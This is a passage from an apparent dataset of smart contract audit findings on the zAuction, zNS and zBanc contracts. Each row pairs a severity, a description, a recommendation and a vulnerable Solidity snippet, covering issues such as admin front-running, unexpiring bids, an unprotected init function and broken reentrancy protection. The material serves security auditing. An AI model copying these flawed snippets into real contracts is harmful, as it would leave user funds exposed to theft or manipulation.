Remove dead/unreachable code. Fix the implementations to perform proper accounting before reintroducing them if they are called by zAuction.,,"```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n```\\n" +zAuction - Unpredictable behavior for users due to admin front running or general bad timing,high,"An administrator of `zAuctionAccountant` contract can update the `zAuction` contract without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nupdating the `zAuction` takes effect immediately. This has the potential to fail acceptance of bids by sellers on the now outdated `zAuction` contract as interaction with the accountant contract is now rejected. This forces bidders to reissue their bids in order for the seller to be able to accept them using the Accountant contract. 
This may also be used by admins to selectively censor the acceptance of accountant based bids by changing the active `zAuction` address.\\n```\\n function SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n }\\n\\n function SetAdmin(address newadmin) external onlyAdmin{\\n admin = newadmin;\\n emit AdminSet(msg.sender, newadmin);\\n }\\n```\\n\\nUpgradeable contracts may introduce the same unpredictability issues where the proxyUpgradeable owner may divert execution to a new zNS registrar implementation selectively for certain transactions or without prior notice to users.","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.\\nValidate arguments before updating contract addresses (at least != current/0x0). 
Consider implementing a 2-step admin ownership transfer (transfer+accept) to avoid losing control of the contract by providing the wrong `ETH` address.",,"```\\n function SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n }\\n\\n function SetAdmin(address newadmin) external onlyAdmin{\\n admin = newadmin;\\n emit AdminSet(msg.sender, newadmin);\\n }\\n```\\n" +"zAuction, zNS - Bids cannot be cancelled, never expire, and the auction lifecycle is unclear",high,"The lifecycle of a bid both for `zAuction` and `zNS` is not clear, and has many flaws.\\n`zAuction` - Consider the case where a bid is placed, then the underlying asset in being transferred to a new owner. The new owner can now force to sell the asset even though it's might not be relevant anymore.\\n`zAuction` - Once a bid was accepted and the asset was transferred, all other bids need to be invalidated automatically, otherwise and old bid might be accepted even after the formal auction is over.\\n`zAuction`, `zNS` - There is no way for the bidder to cancel an old bid. That might be useful in the event of a significant change in market trend, where the old pricing is no longer relevant. 
Currently, in order to cancel a bid, the bidder can either withdraw his ether balance from the `zAuctionAccountant`, or disapprove `WETH` which requires an extra transaction that might be front-runned by the seller.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, ""ZNS: bid info doesnt match/exist"");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, ""ZNS: has been fullfilled"");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n 
metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n","Consider adding an expiration field to the message signed by the bidder both for `zAuction` and `zNS`. Consider adding auction control, creating an `auctionId`, and have users bid on specific auctions. By adding this id to the signed message, all other bids are invalidated automatically and users would have to place new bids for a new auction. Optionally allow users to cancel bids explicitly.\\n",,"```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n" +zAuction - pot. initialization fronrunning and unnecessary init function,medium,"The `zAuction` initialization method is unprotected and while only being executable once, can be called by anyone. 
This might allow someone to monitor the mempool for new deployments of this contract and fron-run the initialization to initialize it with different parameters.\\nA mitigating factor is that this condition can be detected by the deployer as subsequent calls to `init()` will fail.\\nNote: this doesn't adhere to common interface naming convention/oz naming convention where this method would be called `initialize`.\\nNote: that zNS in contrast relies on ou/initializable pattern with proper naming.\\nNote: that this function might not be necessary at all and should be replaced by a constructor instead, as the contract is not used with a proxy pattern.\\n```\\nfunction init(address accountantaddress) external {\\n require(!initialized);\\n initialized = true;\\n accountant = zAuctionAccountant(accountantaddress);\\n}\\n```\\n","The contract is not used in a proxy pattern, hence, the initialization should be performed in the `constructor` instead.",,```\\nfunction init(address accountantaddress) external {\\n require(!initialized);\\n initialized = true;\\n accountant = zAuctionAccountant(accountantaddress);\\n}\\n```\\n +zAuction - unclear upgrade path,medium,`zAuction` appears to implement an upgrade path for the auction system via `zAuctionAccountant`. `zAuction` itself does not hold any value. The `zAuctionAccountant` can be configured to allow only one `zAution` contract to interact with it. The update of the contract reference takes effect immediately (https://github.com/ConsenSys/zer0-zauction-audit-2021-05/issues/7).\\nAcceptance of bids via the accountant on the old contract immediately fail after an admin updates the referenced `zAuction` contract while `WETH` bids may still continue. 
This may create an unfavorable scenario where two contracts may be active in parallel accepting `WETH` bids.\\nIt should also be noted that 2nd layer bids (signed data) using the accountant for the old contract will not be acceptable anymore.\\n```\\nfunction SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n}\\n```\\n",Consider re-thinking the upgrade path. Avoid keeping multiple versions of the auction contract active.,,```\\nfunction SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n}\\n```\\n
+zAuction, zNS - gas griefing by spamming offchain fake bids Acknowledged,medium,"The execution status of both `zAuction.acceptBid` and `StakingController.fulfillDomainBid` transactions depend on the bidder, as his approval is needed, his signature is being validated, etc. However, these transactions can be submitted by accounts that are different from the bidder account, or for accounts that do not have the required funds/deposits available, luring the account that has to perform the on-chain call into spending gas on a transaction that is deemed to fail (gas griefing). E.g. 
posting high-value fake bids for zAuction without having funds deposited or `WETH` approved.\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, ""ZNS: bid info doesnt match/exist"");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, ""ZNS: has been fullfilled"");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n",Revert early for checks that depend on the 
bidder before performing gas-intensive computations.\\nConsider adding a dry-run validation for off-chain components before transaction submission.,,"```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, ""ZNS: bid info doesnt match/exist"");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, ""ZNS: has been fullfilled"");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n" +zAuction - hardcoded ropsten token address,low,The auction contract hardcodes the WETH ERC20 token address. this address will not be functional when deploying to mainnet.\\n```\\n IERC20 weth = IERC20(address(0xc778417E063141139Fce010982780140Aa0cD5Ab)); // rinkeby weth\\n```\\n,Resolution\\nAddressed with zer0-os/[email protected]135b2aa and the following statement:\\n5.30 weth address in constructor\\nNote: does not perform input validation as recommended\\nConsider taking the used `WETH` token address as a constructor argument. Avoid code changes to facilitate testing! 
Perform input validation on arguments rejecting `address(0x0)` to facilitate the detection of potential misconfiguration in the deployment pipeline.,,```\\n IERC20 weth = IERC20(address(0xc778417E063141139Fce010982780140Aa0cD5Ab)); // rinkeby weth\\n```\\n +zAuction - accountant allows zero value withdrawals/deposits/exchange,low,"Zero value transfers effectively perform a no-operation sometimes followed by calling out to the recipient of the withdrawal.\\nA transfer where `from==to` or where the value is `0` is ineffective.\\n```\\nfunction Withdraw(uint256 amount) external {\\n ethbalance[msg.sender] = SafeMath.sub(ethbalance[msg.sender], amount);\\n payable(msg.sender).transfer(amount);\\n emit Withdrew(msg.sender, amount);\\n}\\n```\\n\\n```\\nfunction Deposit() external payable {\\n ethbalance[msg.sender] = SafeMath.add(ethbalance[msg.sender], msg.value);\\n emit Deposited(msg.sender, msg.value);\\n}\\n```\\n\\n```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n\\n function Exchange(address from, address to, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n ethbalance[to] = SafeMath.add(ethbalance[to], amount);\\n emit zExchanged(from, to, amount);\\n }\\n```\\n",Consider rejecting ineffective withdrawals (zero value) or at least avoid issuing a zero value `ETH` transfers. 
Avoid emitting successful events for ineffective calls to not trigger 3rd party components on noop's.,,"```\\nfunction Withdraw(uint256 amount) external {\\n ethbalance[msg.sender] = SafeMath.sub(ethbalance[msg.sender], amount);\\n payable(msg.sender).transfer(amount);\\n emit Withdrew(msg.sender, amount);\\n}\\n```\\n" +zAuction - seller should not be able to accept their own bid,low,"A seller can accept their own bid which is an ineffective action that is emitting an event.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n\\n/// @dev 'true' in the hash here is the eth/weth switch\\nfunction acceptWethBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid, true))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n weth.transferFrom(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit WethBidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n",Disallow transfers to self.,,"```\\nfunction acceptBid(bytes memory signature, uint256 
rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n\\n/// @dev 'true' in the hash here is the eth/weth switch\\nfunction acceptWethBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid, true))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n weth.transferFrom(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit WethBidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n" +zBanc - DynamicLiquidTokenConverter ineffective reentrancy protection,high,"`reduceWeight` calls `_protected()` in an attempt to protect from reentrant calls but this check is insufficient as it will only check for the `locked` statevar but never set it. 
A potential for direct reentrancy might be present when an erc-777 token is used as reserve.\\nIt is assumed that the developer actually wanted to use the `protected` modifier that sets the lock before continuing with the method.\\n```\\nfunction reduceWeight(IERC20Token \\_reserveToken)\\n public\\n validReserve(\\_reserveToken)\\n ownerOnly\\n{\\n \\_protected();\\n```\\n\\n```\\ncontract ReentrancyGuard {\\n // true while protected code is being executed, false otherwise\\n bool private locked = false;\\n\\n /\\*\\*\\n \\* @dev ensures instantiation only by sub-contracts\\n \\*/\\n constructor() internal {}\\n\\n // protects a function against reentrancy attacks\\n modifier protected() {\\n \\_protected();\\n locked = true;\\n \\_;\\n locked = false;\\n }\\n\\n // error message binary size optimization\\n function \\_protected() internal view {\\n require(!locked, ""ERR\\_REENTRANCY"");\\n }\\n}\\n```\\n",To mitigate potential attack vectors from reentrant calls remove the call to `_protected()` and decorate the function with `protected` instead. This will properly set the lock before executing the function body rejecting reentrant calls.,,```\\nfunction reduceWeight(IERC20Token \\_reserveToken)\\n public\\n validReserve(\\_reserveToken)\\n ownerOnly\\n{\\n \\_protected();\\n```\\n +zBanc - DynamicLiquidTokenConverter input validation,medium,"Check that the value in `PPM` is within expected bounds before updating system settings that may lead to functionality not working correctly. For example, setting out-of-bounds values for `stepWeight` or `setMinimumWeight` may make calls to `reduceWeight` fail. These values are usually set in the beginning of the lifecycle of the contract and misconfiguration may stay unnoticed until trying to reduce the weights. The settings can be fixed, however, by setting the contract inactive and updating it with valid settings. 
Setting the contract to inactive may temporarily interrupt the normal operation of the contract which may be unfavorable.\\nBoth functions allow the full `uint32` range to be used, which, interpreted as `PPM` would range from `0%` to `4.294,967295%`\\n```\\nfunction setMinimumWeight(uint32 \\_minimumWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_minimumWeight > 0, ""Min weight 0"");\\n //\\_validReserveWeight(\\_minimumWeight);\\n minimumWeight = \\_minimumWeight;\\n emit MinimumWeightUpdated(\\_minimumWeight);\\n}\\n```\\n\\n```\\nfunction setStepWeight(uint32 \\_stepWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_stepWeight > 0, ""Step weight 0"");\\n //\\_validReserveWeight(\\_stepWeight);\\n stepWeight = \\_stepWeight;\\n emit StepWeightUpdated(\\_stepWeight);\\n}\\n```\\n","Reintroduce the checks for `_validReserveWeight` to check that a percent value denoted in `PPM` is within valid bounds `_weight > 0 && _weight <= PPM_RESOLUTION`. There is no need to separately check for the value to be `>0` as this is already ensured by `_validReserveWeight`.\\nNote that there is still room for misconfiguration (step size too high, min-step too high), however, this would at least allow to catch obviously wrong and often erroneously passed parameters early.",,"```\\nfunction setMinimumWeight(uint32 \\_minimumWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_minimumWeight > 0, ""Min weight 0"");\\n //\\_validReserveWeight(\\_minimumWeight);\\n minimumWeight = \\_minimumWeight;\\n emit MinimumWeightUpdated(\\_minimumWeight);\\n}\\n```\\n" +zBanc - DynamicLiquidTokenConverter introduces breaking changes to the underlying bancorprotocol base,medium,"Introducing major changes to the complex underlying smart contract system that zBanc was forked from(bancorprotocol) may result in unnecessary complexity to be added. Complexity usually increases the attack surface and potentially introduces software misbehavior. 
Therefore, it is recommended to focus on reducing the changes to the base system as much as possible and comply with the interfaces and processes of the system instead of introducing diverging behavior.\\nFor example, `DynamicLiquidTokenConverterFactory` does not implement the `ITypedConverterFactory` while other converters do. Furthermore, this interface and the behavior may be expected to only perform certain tasks e.g. when called during an upgrade process. Not adhering to the base systems expectations may result in parts of the system failing to function for the new convertertype. Changes introduced to accommodate the custom behavior/interfaces may result in parts of the system failing to operate with existing converters. This risk is best to be avoided.\\nIn the case of `DynamicLiquidTokenConverterFactory` the interface is imported but not implemented at all (unused import). The reason for this is likely because the function `createConverter` in `DynamicLiquidTokenConverterFactory` does not adhere to the bancor-provided interface anymore as it is doing way more than “just” creating and returning a new converter. This can create problems when trying to upgrade the converter as the upgraded expected the shared interface to be exposed unless the update mechanisms are modified as well.\\nIn general, the factories `createConverter` method appears to perform more tasks than comparable type factories. It is questionable if this is needed but may be required by the design of the system. We would, however, highly recommend to not diverge from how other converters are instantiated unless it is required to provide additional security guarantees (i.e. the token was instantiated by the factory and is therefore trusted).\\nThe `ConverterUpgrader` changed in a way that it now can only work with the `DynamicLiquidTokenconverter` instead of the more generalized `IConverter` interface. 
This probably breaks the update for all other converter types in the system.\\nThe severity is estimated to be medium based on the fact that the development team seems to be aware of the breaking changes but the direction of the design of the system was not yet decided.\\nunused import\\nconverterType should be external as it is not called from within the same or inherited contracts\\n```\\nfunction converterType() public pure returns (uint16) {\\n return 3;\\n}\\n```\\n\\ncreateToken can be external and is actually creating a token and converter that is using that token (the converter is not returned)(consider renaming to createTokenAndConverter)\\n```\\n{\\n DSToken token = new DSToken(\\_name, \\_symbol, \\_decimals);\\n\\n token.issue(msg.sender, \\_initialSupply);\\n\\n emit NewToken(token);\\n\\n createConverter(\\n token,\\n \\_reserveToken,\\n \\_reserveWeight,\\n \\_reserveBalance,\\n \\_registry,\\n \\_maxConversionFee,\\n \\_minimumWeight,\\n \\_stepWeight,\\n \\_marketCapThreshold\\n );\\n\\n return token;\\n}\\n```\\n\\nthe upgrade interface changed and now requires the converter to be a `DynamicLiquidTokenConverter`. 
Other converters may potentially fail to upgrade unless they implement the called interfaces.\\n```\\n function upgradeOld(DynamicLiquidTokenConverter \\_converter, bytes32 \\_version) public {\\n \\_version;\\n DynamicLiquidTokenConverter converter = DynamicLiquidTokenConverter(\\_converter);\\n address prevOwner = converter.owner();\\n acceptConverterOwnership(converter);\\n DynamicLiquidTokenConverter newConverter = createConverter(converter);\\n \\n copyReserves(converter, newConverter);\\n copyConversionFee(converter, newConverter);\\n transferReserveBalances(converter, newConverter);\\n IConverterAnchor anchor = converter.token();\\n \\n // get the activation status before it's being invalidated\\n bool activate = isV28OrHigherConverter(converter) && converter.isActive();\\n \\n if (anchor.owner() == address(converter)) {\\n converter.transferTokenOwnership(address(newConverter));\\n newConverter.acceptAnchorOwnership();\\n }\\n\\n handleTypeSpecificData(converter, newConverter, activate);\\n converter.transferOwnership(prevOwner);\\n \\n newConverter.transferOwnership(prevOwner);\\n \\n emit ConverterUpgrade(address(converter), address(newConverter));\\n }\\n```\\n\\n```\\nfunction upgradeOld(\\n IConverter \\_converter,\\n bytes32 /\\* \\_version \\*/\\n) public {\\n // the upgrader doesn't require the version for older converters\\n upgrade(\\_converter, 0);\\n}\\n```\\n","It is a fundamental design decision to either follow the bancorsystems converter API or diverge into a more customized system with a different design, functionality, or even security assumptions. From the current documentation, it is unclear which way the development team wants to go.\\nHowever, we highly recommend re-evaluating whether the newly introduced type and components should comply with the bancor API (recommended; avoid unnecessary changes to the underlying system,) instead of changing the API for the new components. 
Decide if the new factory should adhere to the usually commonly shared `ITypedConverterFactory` (recommended) and if not, remove the import and provide a new custom shared interface. It is highly recommended to comply and use the bancor systems extensibility mechanisms as intended, keeping the previously audited bancor code in-tact and voiding unnecessary re-assessments of the security impact of changes.",,```\\nfunction converterType() public pure returns (uint16) {\\n return 3;\\n}\\n```\\n +zBanc - DynamicLiquidTokenConverter isActive should only be returned if converter is fully configured and converter parameters should only be updateable while converter is inactive,medium,"By default, a converter is `active` once the anchor ownership was transferred. This is true for converters that do not require to be properly set up with additional parameters before they can be used.\\n```\\n/\\*\\*\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view virtual override returns (bool) {\\n return anchor.owner() == address(this);\\n}\\n```\\n\\nFor a simple converter, this might be sufficient. If a converter requires additional setup steps (e.g. setting certain internal variables, an oracle, limits, etc.) it should return `inactive` until the setup completes. This is to avoid that users are interacting with (or even pot. 
frontrunning) a partially configured converter as this may have unexpected outcomes.\\nFor example, the `LiquidityPoolV2Converter` overrides the `isActive` method to require additional variables be set (oracle) to actually be in `active` state.\\n```\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view override returns (bool) {\\n return super.isActive() && address(priceOracle) != address(0);\\n}\\n```\\n\\nAdditionally, settings can only be updated while the contract is `inactive` which will be the case during an upgrade. This ensures that the `owner` cannot adjust settings at will for an active contract.\\n```\\nfunction activate(\\n IERC20Token \\_primaryReserveToken,\\n IChainlinkPriceOracle \\_primaryReserveOracle,\\n IChainlinkPriceOracle \\_secondaryReserveOracle)\\n public\\n inactive\\n ownerOnly\\n validReserve(\\_primaryReserveToken)\\n notThis(address(\\_primaryReserveOracle))\\n notThis(address(\\_secondaryReserveOracle))\\n validAddress(address(\\_primaryReserveOracle))\\n validAddress(address(\\_secondaryReserveOracle))\\n{\\n```\\n\\nThe `DynamicLiquidTokenConverter` is following a different approach. It inherits the default `isActive` which sets the contract active right after anchor ownership is transferred. This kind of breaks the upgrade process for `DynamicLiquidTokenConverter` as settings cannot be updated while the contract is active (as anchor ownership might be transferred before updating values). To unbreak this behavior a new authentication modifier was added, that allows updates for the upgrade contract while the contract is active. Now this is a behavior that should be avoided as settings should be predictable while a contract is active. 
Instead it would make more sense initially set all the custom settings of the converter to zero (uninitialized) and require them to be set and only the return the contract as active. The behavior basically mirrors the upgrade process of `LiquidityPoolV2Converter`.\\n```\\n modifier ifActiveOnlyUpgrader(){\\n if(isActive()){\\n require(owner == addressOf(CONVERTER\\_UPGRADER), ""ERR\\_ACTIVE\\_NOTUPGRADER"");\\n }\\n \\_;\\n }\\n```\\n\\nPre initialized variables should be avoided. The marketcap threshold can only be set by the calling entity as it may be very different depending on the type of reserve (eth, token).\\n```\\nuint32 public minimumWeight = 30000;\\nuint32 public stepWeight = 10000;\\nuint256 public marketCapThreshold = 10000 ether;\\nuint256 public lastWeightAdjustmentMarketCap = 0;\\n```\\n\\nHere's one of the setter functions that can be called while the contract is active (only by the upgrader contract but changing the ACL commonly followed with other converters).\\n```\\nfunction setMarketCapThreshold(uint256 \\_marketCapThreshold)\\n public\\n ownerOnly\\n ifActiveOnlyUpgrader\\n{\\n marketCapThreshold = \\_marketCapThreshold;\\n emit MarketCapThresholdUpdated(\\_marketCapThreshold);\\n}\\n```\\n","Align the upgrade process as much as possible to how `LiquidityPoolV2Converter` performs it. Comply with the bancor API.\\noverride `isActive` and require the contracts main variables to be set.\\ndo not pre initialize the contracts settings to “some” values. Require them to be set by the caller (and perform input validation)\\nmirror the upgrade process of `LiquidityPoolV2Converter` and instead of `activate` call the setter functions that set the variables. 
After setting the last var and anchor ownership been transferred, the contract should return active.",,"```\\n/\\*\\*\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view virtual override returns (bool) {\\n return anchor.owner() == address(this);\\n}\\n```\\n" +"zBanc - inconsistent DynamicContractRegistry, admin risks",medium,"`DynamicContractRegistry` is a wrapper registry that allows the zBanc to use the custom upgrader contract while still providing access to the normal bancor registry.\\nFor this to work, the registry owner can add or override any registry setting. Settings that don't exist in this contract are attempted to be retrieved from an underlying registry (contractRegistry).\\n```\\nfunction registerAddress(bytes32 \\_contractName, address \\_contractAddress)\\n public\\n ownerOnly\\n validAddress(\\_contractAddress)\\n{\\n```\\n\\nIf the item does not exist in the registry, the request is forwarded to the underlying registry.\\n```\\nfunction addressOf(bytes32 \\_contractName) public view override returns (address) {\\n if(items[\\_contractName].contractAddress != address(0)){\\n return items[\\_contractName].contractAddress;\\n }else{\\n return contractRegistry.addressOf(\\_contractName);\\n }\\n}\\n```\\n\\nAccording to the documentation this registry is owned by zer0 admins and this means users have to trust zer0 admins to play fair.\\nTo handle this, we deploy our own ConverterUpgrader and ContractRegistry owned by zer0 admins who can register new addresses\\nThe owner of the registry (zer0 admins) can change the underlying registry contract at will. The owner can also add new or override any settings that already exist in the underlying registry. 
This may for example allow a malicious owner to change the upgrader contract in an attempt to potentially steal funds from a token converter or upgrade to a new malicious contract. The owner can also front-run registry calls changing registry settings and thus influencing the outcome. Such an event will not go unnoticed as events are emitted.\\nIt should also be noted that `itemCount` will return only the number of items in the wrapper registry but not the number of items in the underlying registry. This may have an unpredictable effect on components consuming this information.\\n```\\n/\\*\\*\\n \\* @dev returns the number of items in the registry\\n \\*\\n \\* @return number of items\\n\\*/\\nfunction itemCount() public view returns (uint256) {\\n return contractNames.length;\\n}\\n```\\n","Resolution\\nThe client acknowledged the admin risk and addressed the `itemCount` concerns by exposing another method that only returns the overridden entries. The following statement was provided:\\n5.10 - keeping this pattern which matches the bancor pattern, and noting the DCR should be owned by a DAO, which is our plan. solved itemCount issue - Added dcrItemCount and made itemCount call the bancor registry's itemCount, so unpredictable behavior due to the count should be eliminated.\\nRequire the owner/zer0 admins to be a DAO or multisig and enforce 2-step (notify->wait->upgrade) registry updates (e.g. by requiring voting or timelocks in the admin contract). Provide transparency about who is the owner of the registry as this may not be clear for everyone. Evaluate the impact of `itemCount` only returning the number of settings in the wrapper not taking into account entries in the subcontract (including pot. 
